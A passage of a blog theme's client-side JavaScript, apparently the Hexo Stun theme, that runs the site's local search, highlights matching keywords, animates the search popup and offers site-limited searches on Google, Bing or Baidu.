                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

  Stun.utils.pjaxReloadLocalSearch();
}, false);

function safeOpenUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

function extSearch(engine) {
  var engines = {
    google: 'https://www.google.com/search?q=',
    bing: 'https://cn.bing.com/search?q=',
    baidu: 'https://www.baidu.com/s?ie=UTF-8&wd=',
  };
  var host = window.location.host;
  var query = $('.search-input input').val().toLowerCase().trim();
  var uri = engines[engine] + query + ' site:' + host;

  if (query) {
    safeOpenUrl(uri);
  } else {
    Stun.utils.popAlert('warning', '请输入字符');
  }
}

var assistSearchList = window.CONFIG.assistSearch;

if (Array.isArray(assistSearchList)) {
  assistSearchList.forEach(function (name) {
    document.querySelector('.search-btns-item--' + name).addEventListener('click', function () {
      extSearch(name);
    }, false);
  });
}</script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script><script type="application/json" src="/search.json"></script></body></html>